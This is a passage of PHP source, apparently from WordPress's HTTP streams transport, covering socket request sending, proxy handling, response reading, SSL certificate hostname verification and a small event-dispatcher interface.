array( 'ssl' => array( 'verify_peer' => $ssl_verify, //'CN_match' => $arrURL['host'], // This is handled by self::verify_ssl_certificate() 'capture_peer_cert' => $ssl_verify, 'SNI_enabled' => true, 'cafile' => $r['sslcertificates'], 'allow_self_signed' => ! $ssl_verify, ), ) ); $timeout = (int) floor( $r['timeout'] ); $utimeout = $timeout == $r['timeout'] ? 0 : 1000000 * $r['timeout'] % 1000000; $connect_timeout = max( $timeout, 1 ); // Store error number. $connection_error = null; // Store error string. $connection_error_str = null; if ( ! WP_DEBUG ) { // In the event that the SSL connection fails, silence the many PHP Warnings. if ( $secure_transport ) { $error_reporting = error_reporting( 0 ); } if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { $handle = @stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } else { $handle = @stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } if ( $secure_transport ) { error_reporting( $error_reporting ); } } else { if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { $handle = stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } else { $handle = stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } } if ( false === $handle ) { // SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken. if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) { return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); } return new WP_Error( 'http_request_failed', $connection_error . ': ' . $connection_error_str ); } // Verify that the SSL certificate is valid for this request. if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) { if ( ! self::verify_ssl_certificate( $handle, $arrURL['host'] ) ) { return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); } } stream_set_timeout( $handle, $timeout, $utimeout ); if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { //Some proxies require full URL in this field. $requestPath = $url; } else { $requestPath = $arrURL['path'] . ( isset( $arrURL['query'] ) ? '?' . $arrURL['query'] : '' ); } $strHeaders = strtoupper( $r['method'] ) . ' ' . $requestPath . ' HTTP/' . $r['httpversion'] . "\r\n"; $include_port_in_host_header = ( ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) || ( 'http' == $arrURL['scheme'] && 80 != $arrURL['port'] ) || ( 'https' == $arrURL['scheme'] && 443 != $arrURL['port'] ) ); if ( $include_port_in_host_header ) { $strHeaders .= 'Host: ' . $arrURL['host'] . ':' . $arrURL['port'] . "\r\n"; } else { $strHeaders .= 'Host: ' . $arrURL['host'] . "\r\n"; } if ( isset( $r['user-agent'] ) ) { $strHeaders .= 'User-agent: ' . $r['user-agent'] . "\r\n"; } if ( is_array( $r['headers'] ) ) { foreach ( (array) $r['headers'] as $header => $headerValue ) { $strHeaders .= $header . ': ' . $headerValue . "\r\n"; } } else { $strHeaders .= $r['headers']; } if ( $proxy->use_authentication() ) { $strHeaders .= $proxy->authentication_header() . "\r\n"; } $strHeaders .= "\r\n"; if ( ! is_null( $r['body'] ) ) { $strHeaders .= $r['body']; } fwrite( $handle, $strHeaders ); if ( ! $r['blocking'] ) { stream_set_blocking( $handle, 0 ); fclose( $handle ); return array( 'headers' => array(), 'body' => '', 'response' => array( 'code' => false, 'message' => false, ), 'cookies' => array(), ); } $strResponse = ''; $bodyStarted = false; $keep_reading = true; $block_size = 4096; if ( isset( $r['limit_response_size'] ) ) { $block_size = min( $block_size, $r['limit_response_size'] ); } // If streaming to a file setup the file handle. if ( $r['stream'] ) { if ( ! WP_DEBUG ) { $stream_handle = @fopen( $r['filename'], 'w+' ); } else { $stream_handle = fopen( $r['filename'], 'w+' ); } if ( ! $stream_handle ) { return new WP_Error( 'http_request_failed', sprintf( /* translators: 1: fopen(), 2: file name */ __( 'Could not open handle for %1$s to %2$s.' ), 'fopen()', $r['filename'] ) ); } $bytes_written = 0; while ( ! feof( $handle ) && $keep_reading ) { $block = fread( $handle, $block_size ); if ( ! $bodyStarted ) { $strResponse .= $block; if ( strpos( $strResponse, "\r\n\r\n" ) ) { $process = WP_Http::processResponse( $strResponse ); $bodyStarted = true; $block = $process['body']; unset( $strResponse ); $process['body'] = ''; } } $this_block_size = strlen( $block ); if ( isset( $r['limit_response_size'] ) && ( $bytes_written + $this_block_size ) > $r['limit_response_size'] ) { $this_block_size = ( $r['limit_response_size'] - $bytes_written ); $block = substr( $block, 0, $this_block_size ); } $bytes_written_to_file = fwrite( $stream_handle, $block ); if ( $bytes_written_to_file != $this_block_size ) { fclose( $handle ); fclose( $stream_handle ); return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) ); } $bytes_written += $bytes_written_to_file; $keep_reading = ! isset( $r['limit_response_size'] ) || $bytes_written < $r['limit_response_size']; } fclose( $stream_handle ); } else { $header_length = 0; while ( ! feof( $handle ) && $keep_reading ) { $block = fread( $handle, $block_size ); $strResponse .= $block; if ( ! $bodyStarted && strpos( $strResponse, "\r\n\r\n" ) ) { $header_length = strpos( $strResponse, "\r\n\r\n" ) + 4; $bodyStarted = true; } $keep_reading = ( ! $bodyStarted || ! isset( $r['limit_response_size'] ) || strlen( $strResponse ) < ( $header_length + $r['limit_response_size'] ) ); } $process = WP_Http::processResponse( $strResponse ); unset( $strResponse ); } fclose( $handle ); $arrHeaders = WP_Http::processHeaders( $process['headers'], $url ); $response = array( 'headers' => $arrHeaders['headers'], // Not yet processed. 'body' => null, 'response' => $arrHeaders['response'], 'cookies' => $arrHeaders['cookies'], 'filename' => $r['filename'], ); // Handle redirects. if ( false !== ( $redirect_response = WP_Http::handle_redirects( $url, $r, $response ) ) ) { return $redirect_response; } // If the body was chunk encoded, then decode it. if ( ! empty( $process['body'] ) && isset( $arrHeaders['headers']['transfer-encoding'] ) && 'chunked' == $arrHeaders['headers']['transfer-encoding'] ) { $process['body'] = WP_Http::chunkTransferDecode( $process['body'] ); } if ( true === $r['decompress'] && true === WP_Http_Encoding::should_decode( $arrHeaders['headers'] ) ) { $process['body'] = WP_Http_Encoding::decompress( $process['body'] ); } if ( isset( $r['limit_response_size'] ) && strlen( $process['body'] ) > $r['limit_response_size'] ) { $process['body'] = substr( $process['body'], 0, $r['limit_response_size'] ); } $response['body'] = $process['body']; return $response; } /** * Verifies the received SSL certificate against its Common Names and subjectAltName fields. * * PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if * the certificate is valid for the hostname which was requested. * This function verifies the requested hostname against certificate's subjectAltName field, * if that is empty, or contains no DNS entries, a fallback to the Common Name field is used. * * IP Address support is included if the request is being made to an IP address. * * @since 3.7.0 * * @param stream $stream The PHP Stream which the SSL request is being made over * @param string $host The hostname being requested * @return bool If the cerficiate presented in $stream is valid for $host */ public static function verify_ssl_certificate( $stream, $host ) { $context_options = stream_context_get_options( $stream ); if ( empty( $context_options['ssl']['peer_certificate'] ) ) { return false; } $cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] ); if ( ! $cert ) { return false; } /* * If the request is being made to an IP address, we'll validate against IP fields * in the cert (if they exist) */ $host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' ); $certificate_hostnames = array(); if ( ! empty( $cert['extensions']['subjectAltName'] ) ) { $match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] ); foreach ( $match_against as $match ) { list( $match_type, $match_host ) = explode( ':', $match ); if ( $host_type == strtolower( trim( $match_type ) ) ) { // IP: or DNS: $certificate_hostnames[] = strtolower( trim( $match_host ) ); } } } elseif ( ! empty( $cert['subject']['CN'] ) ) { // Only use the CN when the certificate includes no subjectAltName extension. $certificate_hostnames[] = strtolower( $cert['subject']['CN'] ); } // Exact hostname/IP matches. if ( in_array( strtolower( $host ), $certificate_hostnames ) ) { return true; } // IP's can't be wildcards, Stop processing. if ( 'ip' == $host_type ) { return false; } // Test to see if the domain is at least 2 deep for wildcard support. if ( substr_count( $host, '.' ) < 2 ) { return false; } // Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com. $wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host ); return in_array( strtolower( $wildcard_host ), $certificate_hostnames ); } /** * Determines whether this class can be used for retrieving a URL. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param array $args Optional. Array of request arguments. Default empty array. * @return bool False means this class can not be used, true means it can. */ public static function test( $args = array() ) { if ( ! function_exists( 'stream_socket_client' ) ) { return false; } $is_ssl = isset( $args['ssl'] ) && $args['ssl']; if ( $is_ssl ) { if ( ! extension_loaded( 'openssl' ) ) { return false; } if ( ! function_exists( 'openssl_x509_parse' ) ) { return false; } } /** * Filters whether streams can be used as a transport for retrieving a URL. * * @since 2.7.0 * * @param bool $use_class Whether the class can be used. Default true. * @param array $args Request arguments. */ return apply_filters( 'use_streams_transport', true, $args ); } } /** * Deprecated HTTP Transport method which used fsockopen. * * This class is not used, and is included for backward compatibility only. * All code should make use of WP_Http directly through its API. * * @see WP_HTTP::request * * @since 2.7.0 * @deprecated 3.7.0 Please use WP_HTTP::request() directly */ class WP_HTTP_Fsockopen extends WP_HTTP_Streams { // For backward compatibility for users who are using the class directly. } /** * Event dispatcher * * @package Requests * @subpackage Utilities */ /** * Event dispatcher * * @package Requests * @subpackage Utilities */ interface Requests_Hooker { /** * Register a callback for a hook * * @param string $hook Hook name * @param callback $callback Function/method to call on event * @param int $priority Priority number. <0 is executed earlier, >0 is executed later */ public function register($hook, $callback, $priority = 0); /** * Dispatch a message * * @param string $hook Hook name * @param array $parameters Parameters to pass to callbacks * @return boolean Successfulness */ public function dispatch($hook, $parameters = array()); }